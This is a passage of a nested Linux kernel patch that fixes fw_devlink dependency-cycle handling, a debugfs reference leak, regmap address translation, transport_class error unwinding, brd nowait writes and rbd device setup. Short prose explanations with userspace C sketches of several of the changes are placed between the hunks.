+ 	device_remove_file(dev, &dev_attr_waiting_for_supplier);
+ 
+@@ -1632,8 +1726,11 @@ static int __init fw_devlink_strict_setup(char *arg)
+ }
+ early_param("fw_devlink.strict", fw_devlink_strict_setup);
+ 
+-u32 fw_devlink_get_flags(void)
++static inline u32 fw_devlink_get_flags(u8 fwlink_flags)
+ {
++	if (fwlink_flags & FWLINK_FLAG_CYCLE)
++		return FW_DEVLINK_FLAGS_PERMISSIVE | DL_FLAG_CYCLE;
++
+ 	return fw_devlink_flags;
+ }
+ 
+@@ -1671,7 +1768,7 @@ static void fw_devlink_relax_link(struct device_link *link)
+ 	if (!(link->flags & DL_FLAG_INFERRED))
+ 		return;
+ 
+-	if (link->flags == (DL_FLAG_MANAGED | FW_DEVLINK_FLAGS_PERMISSIVE))
++	if (device_link_flag_is_sync_state_only(link->flags))
+ 		return;
+ 
+ 	pm_runtime_drop_link(link);
+@@ -1768,44 +1865,138 @@ static void fw_devlink_unblock_consumers(struct device *dev)
+ 	device_links_write_unlock();
+ }
+ 
++
++static bool fwnode_init_without_drv(struct fwnode_handle *fwnode)
++{
++	struct device *dev;
++	bool ret;
++
++	if (!(fwnode->flags & FWNODE_FLAG_INITIALIZED))
++		return false;
++
++	dev = get_dev_from_fwnode(fwnode);
++	ret = !dev || dev->links.status == DL_DEV_NO_DRIVER;
++	put_device(dev);
++
++	return ret;
++}
++
++static bool fwnode_ancestor_init_without_drv(struct fwnode_handle *fwnode)
++{
++	struct fwnode_handle *parent;
++
++	fwnode_for_each_parent_node(fwnode, parent) {
++		if (fwnode_init_without_drv(parent)) {
++			fwnode_handle_put(parent);
++			return true;
++		}
++	}
++
++	return false;
++}
++
+ /**
+- * fw_devlink_relax_cycle - Convert cyclic links to SYNC_STATE_ONLY links
+- * @con: Device to check dependencies for.
+- * @sup: Device to check against.
+- *
+- * Check if @sup depends on @con or any device dependent on it (its child or
+- * its consumer etc).  When such a cyclic dependency is found, convert all
+- * device links created solely by fw_devlink into SYNC_STATE_ONLY device links.
+- * This is the equivalent of doing fw_devlink=permissive just between the
+- * devices in the cycle. We need to do this because, at this point, fw_devlink
+- * can't tell which of these dependencies is not a real dependency.
+- *
+- * Return 1 if a cycle is found. Otherwise, return 0.
++ * __fw_devlink_relax_cycles - Relax and mark dependency cycles.
++ * @con: Potential consumer device.
++ * @sup_handle: Potential supplier's fwnode.
++ *
++ * Needs to be called with fwnode_lock and device link lock held.
++ *
++ * Check if @sup_handle or any of its ancestors or suppliers directly/indirectly
++ * depend on @con. This function can detect multiple cycles between @sup_handle
++ * and @con. When such dependency cycles are found, convert all device links
++ * created solely by fw_devlink into SYNC_STATE_ONLY device links. Also, mark
++ * all fwnode links in the cycle with FWLINK_FLAG_CYCLE so that when they are
++ * converted into a device link in the future, they are created as
++ * SYNC_STATE_ONLY device links. This is the equivalent of doing
++ * fw_devlink=permissive just between the devices in the cycle. We need to do
++ * this because, at this point, fw_devlink can't tell which of these
++ * dependencies is not a real dependency.
++ *
++ * Return true if one or more cycles were found. Otherwise, return false.
+  */
+-static int fw_devlink_relax_cycle(struct device *con, void *sup)
++static bool __fw_devlink_relax_cycles(struct device *con,
++				 struct fwnode_handle *sup_handle)
+ {
+-	struct device_link *link;
+-	int ret;
++	struct device *sup_dev = NULL, *par_dev = NULL;
++	struct fwnode_link *link;
++	struct device_link *dev_link;
++	bool ret = false;
+ 
+-	if (con == sup)
+-		return 1;
++	if (!sup_handle)
++		return false;
+ 
+-	ret = device_for_each_child(con, sup, fw_devlink_relax_cycle);
+-	if (ret)
+-		return ret;
++	/*
++	 * We aren't trying to find all cycles. Just a cycle between con and
++	 * sup_handle.
++	 */
++	if (sup_handle->flags & FWNODE_FLAG_VISITED)
++		return false;
+ 
+-	list_for_each_entry(link, &con->links.consumers, s_node) {
+-		if ((link->flags & ~DL_FLAG_INFERRED) ==
+-		    (DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED))
+-			continue;
++	sup_handle->flags |= FWNODE_FLAG_VISITED;
+ 
+-		if (!fw_devlink_relax_cycle(link->consumer, sup))
+-			continue;
++	sup_dev = get_dev_from_fwnode(sup_handle);
+ 
+-		ret = 1;
++	/* Termination condition. */
++	if (sup_dev == con) {
++		ret = true;
++		goto out;
++	}
+ 
+-		fw_devlink_relax_link(link);
++	/*
++	 * If sup_dev is bound to a driver and @con hasn't started binding to a
++	 * driver, sup_dev can't be a consumer of @con. So, no need to check
++	 * further.
++	 */
++	if (sup_dev && sup_dev->links.status == DL_DEV_DRIVER_BOUND &&
++	    con->links.status == DL_DEV_NO_DRIVER) {
++		ret = false;
++		goto out;
++	}
++
++	list_for_each_entry(link, &sup_handle->suppliers, c_hook) {
++		if (__fw_devlink_relax_cycles(con, link->supplier)) {
++			__fwnode_link_cycle(link);
++			ret = true;
++		}
++	}
++
++	/*
++	 * Give priority to device parent over fwnode parent to account for any
++	 * quirks in how fwnodes are converted to devices.
++	 */
++	if (sup_dev)
++		par_dev = get_device(sup_dev->parent);
++	else
++		par_dev = fwnode_get_next_parent_dev(sup_handle);
++
++	if (par_dev && __fw_devlink_relax_cycles(con, par_dev->fwnode))
++		ret = true;
++
++	if (!sup_dev)
++		goto out;
++
++	list_for_each_entry(dev_link, &sup_dev->links.suppliers, c_node) {
++		/*
++		 * Ignore a SYNC_STATE_ONLY flag only if it wasn't marked as
++		 * such due to a cycle.
++		 */
++		if (device_link_flag_is_sync_state_only(dev_link->flags) &&
++		    !(dev_link->flags & DL_FLAG_CYCLE))
++			continue;
++
++		if (__fw_devlink_relax_cycles(con,
++					      dev_link->supplier->fwnode)) {
++			fw_devlink_relax_link(dev_link);
++			dev_link->flags |= DL_FLAG_CYCLE;
++			ret = true;
++		}
+ 	}
++
++out:
++	sup_handle->flags &= ~FWNODE_FLAG_VISITED;
++	put_device(sup_dev);
++	put_device(par_dev);
+ 	return ret;
+ }
+ 
+@@ -1813,7 +2004,7 @@ static int fw_devlink_relax_cycle(struct device *con, void *sup)
+  * fw_devlink_create_devlink - Create a device link from a consumer to fwnode
+  * @con: consumer device for the device link
+  * @sup_handle: fwnode handle of supplier
+- * @flags: devlink flags
++ * @link: fwnode link that's being converted to a device link
+  *
+  * This function will try to create a device link between the consumer device
+  * @con and the supplier device represented by @sup_handle.
+@@ -1830,10 +2021,17 @@ static int fw_devlink_relax_cycle(struct device *con, void *sup)
+  *  possible to do that in the future
+  */
+ static int fw_devlink_create_devlink(struct device *con,
+-				     struct fwnode_handle *sup_handle, u32 flags)
++				     struct fwnode_handle *sup_handle,
++				     struct fwnode_link *link)
+ {
+ 	struct device *sup_dev;
+ 	int ret = 0;
++	u32 flags;
++
++	if (con->fwnode == link->consumer)
++		flags = fw_devlink_get_flags(link->flags);
++	else
++		flags = FW_DEVLINK_FLAGS_PERMISSIVE;
+ 
+ 	/*
+ 	 * In some cases, a device P might also be a supplier to its child node
+@@ -1854,7 +2052,26 @@ static int fw_devlink_create_devlink(struct device *con,
+ 	    fwnode_is_ancestor_of(sup_handle, con->fwnode))
+ 		return -EINVAL;
+ 
+-	sup_dev = get_dev_from_fwnode(sup_handle);
++	/*
++	 * SYNC_STATE_ONLY device links don't block probing and support cycles.
++	 * So cycle detection isn't necessary and shouldn't be done.
++	 */
++	if (!(flags & DL_FLAG_SYNC_STATE_ONLY)) {
++		device_links_write_lock();
++		if (__fw_devlink_relax_cycles(con, sup_handle)) {
++			__fwnode_link_cycle(link);
++			flags = fw_devlink_get_flags(link->flags);
++			dev_info(con, "Fixed dependency cycle(s) with %pfwf\n",
++				 sup_handle);
++		}
++		device_links_write_unlock();
++	}
++
++	if (sup_handle->flags & FWNODE_FLAG_NOT_DEVICE)
++		sup_dev = fwnode_get_next_parent_dev(sup_handle);
++	else
++		sup_dev = get_dev_from_fwnode(sup_handle);
++
+ 	if (sup_dev) {
+ 		/*
+ 		 * If it's one of those drivers that don't actually bind to
+@@ -1863,71 +2080,34 @@ static int fw_devlink_create_devlink(struct device *con,
+ 		 */
+ 		if (sup_dev->links.status == DL_DEV_NO_DRIVER &&
+ 		    sup_handle->flags & FWNODE_FLAG_INITIALIZED) {
++			dev_dbg(con,
++				"Not linking %pfwf - dev might never probe\n",
++				sup_handle);
+ 			ret = -EINVAL;
+ 			goto out;
+ 		}
+ 
+-		/*
+-		 * If this fails, it is due to cycles in device links.  Just
+-		 * give up on this link and treat it as invalid.
+-		 */
+-		if (!device_link_add(con, sup_dev, flags) &&
+-		    !(flags & DL_FLAG_SYNC_STATE_ONLY)) {
+-			dev_info(con, "Fixing up cyclic dependency with %s\n",
+-				 dev_name(sup_dev));
+-			device_links_write_lock();
+-			fw_devlink_relax_cycle(con, sup_dev);
+-			device_links_write_unlock();
+-			device_link_add(con, sup_dev,
+-					FW_DEVLINK_FLAGS_PERMISSIVE);
++		if (con != sup_dev && !device_link_add(con, sup_dev, flags)) {
++			dev_err(con, "Failed to create device link (0x%x) with %s\n",
++				flags, dev_name(sup_dev));
+ 			ret = -EINVAL;
+ 		}
+ 
+ 		goto out;
+ 	}
+ 
+-	/* Supplier that's already initialized without a struct device. */
+-	if (sup_handle->flags & FWNODE_FLAG_INITIALIZED)
+-		return -EINVAL;
+-
+ 	/*
+-	 * DL_FLAG_SYNC_STATE_ONLY doesn't block probing and supports
+-	 * cycles. So cycle detection isn't necessary and shouldn't be
+-	 * done.
++	 * Supplier or supplier's ancestor already initialized without a struct
++	 * device or being probed by a driver.
+ 	 */
+-	if (flags & DL_FLAG_SYNC_STATE_ONLY)
+-		return -EAGAIN;
+-
+-	/*
+-	 * If we can't find the supplier device from its fwnode, it might be
+-	 * due to a cyclic dependency between fwnodes. Some of these cycles can
+-	 * be broken by applying logic. Check for these types of cycles and
+-	 * break them so that devices in the cycle probe properly.
+-	 *
+-	 * If the supplier's parent is dependent on the consumer, then the
+-	 * consumer and supplier have a cyclic dependency. Since fw_devlink
+-	 * can't tell which of the inferred dependencies are incorrect, don't
+-	 * enforce probe ordering between any of the devices in this cyclic
+-	 * dependency. Do this by relaxing all the fw_devlink device links in
+-	 * this cycle and by treating the fwnode link between the consumer and
+-	 * the supplier as an invalid dependency.
+-	 */
+-	sup_dev = fwnode_get_next_parent_dev(sup_handle);
+-	if (sup_dev && device_is_dependent(con, sup_dev)) {
+-		dev_info(con, "Fixing up cyclic dependency with %pfwP (%s)\n",
+-			 sup_handle, dev_name(sup_dev));
+-		device_links_write_lock();
+-		fw_devlink_relax_cycle(con, sup_dev);
+-		device_links_write_unlock();
+-		ret = -EINVAL;
+-	} else {
+-		/*
+-		 * Can't check for cycles or no cycles. So let's try
+-		 * again later.
+-		 */
+-		ret = -EAGAIN;
++	if (fwnode_init_without_drv(sup_handle) ||
++	    fwnode_ancestor_init_without_drv(sup_handle)) {
++		dev_dbg(con, "Not linking %pfwf - might never become dev\n",
++			sup_handle);
++		return -EINVAL;
+ 	}
+ 
++	ret = -EAGAIN;
+ out:
+ 	put_device(sup_dev);
+ 	return ret;
+@@ -1955,7 +2135,6 @@ static void __fw_devlink_link_to_consumers(struct device *dev)
+ 	struct fwnode_link *link, *tmp;
+ 
+ 	list_for_each_entry_safe(link, tmp, &fwnode->consumers, s_hook) {
+-		u32 dl_flags = fw_devlink_get_flags();
+ 		struct device *con_dev;
+ 		bool own_link = true;
+ 		int ret;
+@@ -1985,14 +2164,13 @@ static void __fw_devlink_link_to_consumers(struct device *dev)
+ 				con_dev = NULL;
+ 			} else {
+ 				own_link = false;
+-				dl_flags = FW_DEVLINK_FLAGS_PERMISSIVE;
+ 			}
+ 		}
+ 
+ 		if (!con_dev)
+ 			continue;
+ 
+-		ret = fw_devlink_create_devlink(con_dev, fwnode, dl_flags);
++		ret = fw_devlink_create_devlink(con_dev, fwnode, link);
+ 		put_device(con_dev);
+ 		if (!own_link || ret == -EAGAIN)
+ 			continue;
+@@ -2012,10 +2190,7 @@ static void __fw_devlink_link_to_consumers(struct device *dev)
+  *
+  * The function creates normal (non-SYNC_STATE_ONLY) device links between @dev
+  * and the real suppliers of @dev. Once these device links are created, the
+- * fwnode links are deleted. When such device links are successfully created,
+- * this function is called recursively on those supplier devices. This is
+- * needed to detect and break some invalid cycles in fwnode links.  See
+- * fw_devlink_create_devlink() for more details.
++ * fwnode links are deleted.
+  *
+  * In addition, it also looks at all the suppliers of the entire fwnode tree
+  * because some of the child devices of @dev that have not been added yet
+@@ -2033,44 +2208,16 @@ static void __fw_devlink_link_to_suppliers(struct device *dev,
+ 	bool own_link = (dev->fwnode == fwnode);
+ 	struct fwnode_link *link, *tmp;
+ 	struct fwnode_handle *child = NULL;
+-	u32 dl_flags;
+-
+-	if (own_link)
+-		dl_flags = fw_devlink_get_flags();
+-	else
+-		dl_flags = FW_DEVLINK_FLAGS_PERMISSIVE;
+ 
+ 	list_for_each_entry_safe(link, tmp, &fwnode->suppliers, c_hook) {
+ 		int ret;
+-		struct device *sup_dev;
+ 		struct fwnode_handle *sup = link->supplier;
+ 
+-		ret = fw_devlink_create_devlink(dev, sup, dl_flags);
++		ret = fw_devlink_create_devlink(dev, sup, link);
+ 		if (!own_link || ret == -EAGAIN)
+ 			continue;
+ 
+ 		__fwnode_link_del(link);
+-
+-		/* If no device link was created, nothing more to do. */
+-		if (ret)
+-			continue;
+-
+-		/*
+-		 * If a device link was successfully created to a supplier, we
+-		 * now need to try and link the supplier to all its suppliers.
+-		 *
+-		 * This is needed to detect and delete false dependencies in
+-		 * fwnode links that haven't been converted to a device link
+-		 * yet. See comments in fw_devlink_create_devlink() for more
+-		 * details on the false dependency.
+-		 *
+-		 * Without deleting these false dependencies, some devices will
+-		 * never probe because they'll keep waiting for their false
+-		 * dependency fwnode links to be converted to device links.
+-		 */
+-		sup_dev = get_dev_from_fwnode(sup);
+-		__fw_devlink_link_to_suppliers(sup_dev, sup_dev->fwnode);
+-		put_device(sup_dev);
+ 	}
+ 
+ 	/*
+@@ -3451,7 +3598,7 @@ int device_add(struct device *dev)
+ 	/* we require the name to be set before, and pass NULL */
+ 	error = kobject_add(&dev->kobj, dev->kobj.parent, NULL);
+ 	if (error) {
+-		glue_dir = get_glue_dir(dev);
++		glue_dir = kobj;
+ 		goto Error;
+ 	}
+ 
+@@ -3551,6 +3698,7 @@ done:
+ 	device_pm_remove(dev);
+ 	dpm_sysfs_remove(dev);
+  DPMError:
++	dev->driver = NULL;
+ 	bus_remove_device(dev);
+  BusError:
+ 	device_remove_attrs(dev);
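
At its core, the new __fw_devlink_relax_cycles() above is a depth-first search over fwnode and device links: a VISITED flag prunes re-entry, reaching the consumer is the termination condition, and every link on a path that reaches the consumer gets marked as part of a cycle. Below is a minimal userspace C sketch of that shape; the node and link types are hypothetical stand-ins for fwnode_handle and fwnode_link, not kernel code.

#include <stdbool.h>
#include <stdio.h>

#define MAX_LINKS 4

struct node;

struct link {
	struct node *supplier;
	bool cycle;
};

struct node {
	const char *name;
	bool visited;
	struct link links[MAX_LINKS];
	int nr_links;
};

/*
 * Return true if any supplier path starting at 'sup' reaches 'con'.
 * Every link on such a path is flagged as belonging to a cycle.
 */
static bool relax_cycles(struct node *con, struct node *sup)
{
	bool ret = false;

	if (!sup || sup->visited)
		return false;		/* prune: already on the current path */
	if (sup == con)
		return true;		/* termination condition */

	sup->visited = true;
	for (int i = 0; i < sup->nr_links; i++) {
		if (relax_cycles(con, sup->links[i].supplier)) {
			sup->links[i].cycle = true;	/* mark and keep scanning */
			ret = true;
		}
	}
	sup->visited = false;		/* allow other paths through this node */
	return ret;
}

int main(void)
{
	struct node con = { .name = "con" }, mid = { .name = "mid" }, sup = { .name = "sup" };

	/* con consumes sup; sup consumes mid; mid consumes con: a cycle. */
	sup.links[sup.nr_links++] = (struct link){ .supplier = &mid };
	mid.links[mid.nr_links++] = (struct link){ .supplier = &con };

	if (relax_cycles(&con, &sup))
		printf("cycle: relaxed %d link(s)\n",
		       sup.links[0].cycle + mid.links[0].cycle);
	return 0;
}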
+diff --git a/drivers/base/physical_location.c b/drivers/base/physical_location.c
+index 87af641cfe1a3..951819e71b4ad 100644
+--- a/drivers/base/physical_location.c
++++ b/drivers/base/physical_location.c
+@@ -24,8 +24,11 @@ bool dev_add_physical_location(struct device *dev)
+ 
+ 	dev->physical_location =
+ 		kzalloc(sizeof(*dev->physical_location), GFP_KERNEL);
+-	if (!dev->physical_location)
++	if (!dev->physical_location) {
++		ACPI_FREE(pld);
+ 		return false;
++	}
++
+ 	dev->physical_location->panel = pld->panel;
+ 	dev->physical_location->vertical_position = pld->vertical_position;
+ 	dev->physical_location->horizontal_position = pld->horizontal_position;
+diff --git a/drivers/base/power/domain.c b/drivers/base/power/domain.c
+index 6471b559230e9..b411201f75bfb 100644
+--- a/drivers/base/power/domain.c
++++ b/drivers/base/power/domain.c
+@@ -220,13 +220,10 @@ static void genpd_debug_add(struct generic_pm_domain *genpd);
+ 
+ static void genpd_debug_remove(struct generic_pm_domain *genpd)
+ {
+-	struct dentry *d;
+-
+ 	if (!genpd_debugfs_dir)
+ 		return;
+ 
+-	d = debugfs_lookup(genpd->name, genpd_debugfs_dir);
+-	debugfs_remove(d);
++	debugfs_lookup_and_remove(genpd->name, genpd_debugfs_dir);
+ }
+ 
+ static void genpd_update_accounting(struct generic_pm_domain *genpd)
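
The genpd hunk replaces a debugfs_lookup()/debugfs_remove() pair with debugfs_lookup_and_remove(): the lookup returns a referenced dentry, and the old code never dropped that reference. A toy refcount model of why the combined helper avoids the leak, assuming (as in debugfs) that lookup takes a reference and removal drops only the creation reference:

#include <stdio.h>

struct dentry {
	int refs;
};

static struct dentry *lookup(struct dentry *d)
{
	d->refs++;		/* lookup returns a referenced dentry */
	return d;
}

static void dput(struct dentry *d)
{
	d->refs--;
}

static void remove_entry(struct dentry *d)
{
	d->refs--;		/* drops the creation reference only */
}

/* The combined helper never lets the lookup reference escape. */
static void lookup_and_remove(struct dentry *d)
{
	struct dentry *found = lookup(d);

	remove_entry(found);
	dput(found);		/* balance the reference lookup() took */
}

int main(void)
{
	struct dentry d = { .refs = 1 };	/* creation reference */

	lookup_and_remove(&d);
	printf("refs after removal: %d\n", d.refs);	/* 0: nothing leaked */
	return 0;
}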
+diff --git a/drivers/base/regmap/regmap.c b/drivers/base/regmap/regmap.c
+index c6d6d53e8cd3f..7de1f27d0323d 100644
+--- a/drivers/base/regmap/regmap.c
++++ b/drivers/base/regmap/regmap.c
+@@ -1942,6 +1942,8 @@ static int _regmap_bus_reg_write(void *context, unsigned int reg,
+ {
+ 	struct regmap *map = context;
+ 
++	reg += map->reg_base;
++	reg >>= map->format.reg_downshift;
+ 	return map->bus->reg_write(map->bus_context, reg, val);
+ }
+ 
+@@ -2840,6 +2842,8 @@ static int _regmap_bus_reg_read(void *context, unsigned int reg,
+ {
+ 	struct regmap *map = context;
+ 
++	reg += map->reg_base;
++	reg >>= map->format.reg_downshift;
+ 	return map->bus->reg_read(map->bus_context, reg, val);
+ }
+ 
+@@ -3231,6 +3235,8 @@ static int _regmap_update_bits(struct regmap *map, unsigned int reg,
+ 		*change = false;
+ 
+ 	if (regmap_volatile(map, reg) && map->reg_update_bits) {
++		reg += map->reg_base;
++		reg >>= map->format.reg_downshift;
+ 		ret = map->reg_update_bits(map->bus_context, reg, mask, val);
+ 		if (ret == 0 && change)
+ 			*change = true;
+diff --git a/drivers/base/transport_class.c b/drivers/base/transport_class.c
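
The three regmap hunks make the bus reg_read/reg_write/reg_update_bits paths apply the same address translation the other accessors already perform: add map->reg_base, then shift right by the configured downshift. A sketch of just that translation, with hypothetical field names mirroring the regmap ones:

#include <stdio.h>

struct map_cfg {
	unsigned int reg_base;		/* constant offset, added first */
	unsigned int reg_downshift;	/* then the address is scaled down */
};

static unsigned int translate_reg(const struct map_cfg *cfg, unsigned int reg)
{
	reg += cfg->reg_base;
	return reg >> cfg->reg_downshift;
}

int main(void)
{
	struct map_cfg cfg = { .reg_base = 0x100, .reg_downshift = 2 };

	/* Register 0x20 in map space is (0x20 + 0x100) >> 2 = 0x48 on the bus. */
	printf("bus register = 0x%x\n", translate_reg(&cfg, 0x20));
	return 0;
}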
+index ccc86206e5087..09ee2a1e35bbd 100644
+--- a/drivers/base/transport_class.c
++++ b/drivers/base/transport_class.c
+@@ -155,12 +155,27 @@ static int transport_add_class_device(struct attribute_container *cont,
+ 				      struct device *dev,
+ 				      struct device *classdev)
+ {
++	struct transport_class *tclass = class_to_transport_class(cont->class);
+ 	int error = attribute_container_add_class_device(classdev);
+ 	struct transport_container *tcont = 
+ 		attribute_container_to_transport_container(cont);
+ 
+-	if (!error && tcont->statistics)
++	if (error)
++		goto err_remove;
++
++	if (tcont->statistics) {
+ 		error = sysfs_create_group(&classdev->kobj, tcont->statistics);
++		if (error)
++			goto err_del;
++	}
++
++	return 0;
++
++err_del:
++	attribute_container_class_device_del(classdev);
++err_remove:
++	if (tclass->remove)
++		tclass->remove(tcont, dev, classdev);
+ 
+ 	return error;
+ }
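
The transport_class change turns a single conditional into the conventional goto unwind ladder, so each failure point undoes exactly what succeeded before it and the class's remove hook still runs. A generic userspace sketch of the pattern; the step and undo functions are hypothetical:

#include <errno.h>
#include <stdio.h>

static int add_class_device(void)	{ return 0; }
static int create_stats_group(void)	{ return -ENOMEM; }	/* simulate failure */
static void del_class_device(void)	{ puts("del class device"); }
static void call_remove_hook(void)	{ puts("remove hook"); }

static int add_device(void)
{
	int error;

	error = add_class_device();
	if (error)
		goto err_remove;

	error = create_stats_group();
	if (error)
		goto err_del;

	return 0;

err_del:
	del_class_device();	/* unwind only what actually succeeded */
err_remove:
	call_remove_hook();	/* mirrors the tclass->remove() call */
	return error;
}

int main(void)
{
	printf("add_device() = %d\n", add_device());
	return 0;
}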
+diff --git a/drivers/block/brd.c b/drivers/block/brd.c
+index 20acc4a1fd6de..a8a77a1efe1e3 100644
+--- a/drivers/block/brd.c
++++ b/drivers/block/brd.c
+@@ -78,32 +78,25 @@ static struct page *brd_lookup_page(struct brd_device *brd, sector_t sector)
+ }
+ 
+ /*
+- * Look up and return a brd's page for a given sector.
+- * If one does not exist, allocate an empty page, and insert that. Then
+- * return it.
++ * Insert a new page for a given sector, if one does not already exist.
+  */
+-static struct page *brd_insert_page(struct brd_device *brd, sector_t sector)
++static int brd_insert_page(struct brd_device *brd, sector_t sector, gfp_t gfp)
+ {
+ 	pgoff_t idx;
+ 	struct page *page;
+-	gfp_t gfp_flags;
++	int ret = 0;
+ 
+ 	page = brd_lookup_page(brd, sector);
+ 	if (page)
+-		return page;
++		return 0;
+ 
+-	/*
+-	 * Must use NOIO because we don't want to recurse back into the
+-	 * block or filesystem layers from page reclaim.
+-	 */
+-	gfp_flags = GFP_NOIO | __GFP_ZERO | __GFP_HIGHMEM;
+-	page = alloc_page(gfp_flags);
++	page = alloc_page(gfp | __GFP_ZERO | __GFP_HIGHMEM);
+ 	if (!page)
+-		return NULL;
++		return -ENOMEM;
+ 
+-	if (radix_tree_preload(GFP_NOIO)) {
++	if (radix_tree_maybe_preload(gfp)) {
+ 		__free_page(page);
+-		return NULL;
++		return -ENOMEM;
+ 	}
+ 
+ 	spin_lock(&brd->brd_lock);
+@@ -112,16 +105,17 @@ static struct page *brd_insert_page(struct brd_device *brd, sector_t sector)
+ 	if (radix_tree_insert(&brd->brd_pages, idx, page)) {
+ 		__free_page(page);
+ 		page = radix_tree_lookup(&brd->brd_pages, idx);
+-		BUG_ON(!page);
+-		BUG_ON(page->index != idx);
++		if (!page)
++			ret = -ENOMEM;
++		else if (page->index != idx)
++			ret = -EIO;
+ 	} else {
+ 		brd->brd_nr_pages++;
+ 	}
+ 	spin_unlock(&brd->brd_lock);
+ 
+ 	radix_tree_preload_end();
+-
+-	return page;
++	return ret;
+ }
+ 
+ /*
+@@ -170,20 +164,22 @@ static void brd_free_pages(struct brd_device *brd)
+ /*
+  * copy_to_brd_setup must be called before copy_to_brd. It may sleep.
+  */
+-static int copy_to_brd_setup(struct brd_device *brd, sector_t sector, size_t n)
++static int copy_to_brd_setup(struct brd_device *brd, sector_t sector, size_t n,
++			     gfp_t gfp)
+ {
+ 	unsigned int offset = (sector & (PAGE_SECTORS-1)) << SECTOR_SHIFT;
+ 	size_t copy;
++	int ret;
+ 
+ 	copy = min_t(size_t, n, PAGE_SIZE - offset);
+-	if (!brd_insert_page(brd, sector))
+-		return -ENOSPC;
++	ret = brd_insert_page(brd, sector, gfp);
++	if (ret)
++		return ret;
+ 	if (copy < n) {
+ 		sector += copy >> SECTOR_SHIFT;
+-		if (!brd_insert_page(brd, sector))
+-			return -ENOSPC;
++		ret = brd_insert_page(brd, sector, gfp);
+ 	}
+-	return 0;
++	return ret;
+ }
+ 
+ /*
+@@ -256,20 +252,26 @@ static void copy_from_brd(void *dst, struct brd_device *brd,
+  * Process a single bvec of a bio.
+  */
+ static int brd_do_bvec(struct brd_device *brd, struct page *page,
+-			unsigned int len, unsigned int off, enum req_op op,
++			unsigned int len, unsigned int off, blk_opf_t opf,
+ 			sector_t sector)
+ {
+ 	void *mem;
+ 	int err = 0;
+ 
+-	if (op_is_write(op)) {
+-		err = copy_to_brd_setup(brd, sector, len);
++	if (op_is_write(opf)) {
++		/*
++		 * Must use NOIO because we don't want to recurse back into the
++		 * block or filesystem layers from page reclaim.
++		 */
++		gfp_t gfp = opf & REQ_NOWAIT ? GFP_NOWAIT : GFP_NOIO;
++
++		err = copy_to_brd_setup(brd, sector, len, gfp);
+ 		if (err)
+ 			goto out;
+ 	}
+ 
+ 	mem = kmap_atomic(page);
+-	if (!op_is_write(op)) {
++	if (!op_is_write(opf)) {
+ 		copy_from_brd(mem + off, brd, sector, len);
+ 		flush_dcache_page(page);
+ 	} else {
+@@ -298,8 +300,12 @@ static void brd_submit_bio(struct bio *bio)
+ 				(len & (SECTOR_SIZE - 1)));
+ 
+ 		err = brd_do_bvec(brd, bvec.bv_page, len, bvec.bv_offset,
+-				  bio_op(bio), sector);
++				  bio->bi_opf, sector);
+ 		if (err) {
++			if (err == -ENOMEM && bio->bi_opf & REQ_NOWAIT) {
++				bio_wouldblock_error(bio);
++				return;
++			}
+ 			bio_io_error(bio);
+ 			return;
+ 		}
+@@ -412,6 +418,7 @@ static int brd_alloc(int i)
+ 	/* Tell the block layer that this is not a rotational device */
+ 	blk_queue_flag_set(QUEUE_FLAG_NONROT, disk->queue);
+ 	blk_queue_flag_clear(QUEUE_FLAG_ADD_RANDOM, disk->queue);
++	blk_queue_flag_set(QUEUE_FLAG_NOWAIT, disk->queue);
+ 	err = add_disk(disk);
+ 	if (err)
+ 		goto out_cleanup_disk;
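
brd now derives its allocation mode from the request flags: REQ_NOWAIT writes allocate with GFP_NOWAIT, everything else keeps GFP_NOIO, and -ENOMEM on a nowait bio is completed as "would block" instead of a hard I/O error. A userspace sketch of that decision; the flag constant and allocator behaviour are simulated, not the real block-layer ones:

#include <errno.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>

#define REQ_NOWAIT (1u << 0)	/* hypothetical stand-in for the block-layer flag */

static void *alloc_backing_page(bool nowait)
{
	if (nowait)
		return NULL;	/* model GFP_NOWAIT failing under memory pressure */
	return calloc(1, 4096);	/* model GFP_NOIO: may block, usually succeeds */
}

static int do_write(unsigned int opf)
{
	void *page = alloc_backing_page(opf & REQ_NOWAIT);

	if (!page)		/* nowait submitters get EAGAIN, not a hard EIO */
		return (opf & REQ_NOWAIT) ? -EAGAIN : -EIO;
	free(page);
	return 0;
}

int main(void)
{
	printf("nowait write -> %d\n", do_write(REQ_NOWAIT));	/* -EAGAIN */
	printf("normal write -> %d\n", do_write(0));		/* 0 */
	return 0;
}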
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index 04453f4a319cb..60aed196a2e54 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -5292,8 +5292,7 @@ static void rbd_dev_release(struct device *dev)
+ 		module_put(THIS_MODULE);
+ }
+ 
+-static struct rbd_device *__rbd_dev_create(struct rbd_client *rbdc,
+-					   struct rbd_spec *spec)
++static struct rbd_device *__rbd_dev_create(struct rbd_spec *spec)
+ {
+ 	struct rbd_device *rbd_dev;
+ 
+@@ -5338,9 +5337,6 @@ static struct rbd_device *__rbd_dev_create(struct rbd_client *rbdc,
+ 	rbd_dev->dev.parent = &rbd_root_dev;
+ 	device_initialize(&rbd_dev->dev);
+ 
+-	rbd_dev->rbd_client = rbdc;
+-	rbd_dev->spec = spec;
+-
+ 	return rbd_dev;
+ }
+ 
+@@ -5353,12 +5349,10 @@ static struct rbd_device *rbd_dev_create(struct rbd_client *rbdc,
+ {
+ 	struct rbd_device *rbd_dev;
+ 
+-	rbd_dev = __rbd_dev_create(rbdc, spec);
++	rbd_dev = __rbd_dev_create(spec);
+ 	if (!rbd_dev)
+ 		return NULL;
+ 
+-	rbd_dev->opts = opts;
+-
+ 	/* get an id and fill in device name */
+ 	rbd_dev->dev_id = ida_simple_get(&rbd_dev_id_ida, 0,
+ 					 minor_to_rbd_dev_id(1 << MINORBITS),
+@@ -5375,6 +5369,10 @@ static struct rbd_device *rbd_dev_create(struct rbd_client *rbdc,
+ 	/* we have a ref from do_rbd_add() */
+ 	__module_get(THIS_MODULE);
+ 
++	rbd_dev->rbd_client = rbdc;
++	rbd_dev->spec = spec;
++	rbd_dev->opts = opts;
++
+ 	dout("%s rbd_dev %p dev_id %d\n", __func__, rbd_dev, rbd_dev->dev_id);
+ 	return rbd_dev;
+ 
+@@ -6736,7 +6734,7 @@ static int rbd_dev_probe_parent(struct rbd_device *rbd_dev, int depth)
+ 		goto out_err;
+ 	}
+ 
+-	parent = __rbd_dev_create(rbd_dev->rbd_client, rbd_dev->parent_spec);
++	parent = __rbd_dev_create(rbd_dev->parent_spec);
+ 	if (!parent) {
+ 		ret = -ENOMEM;
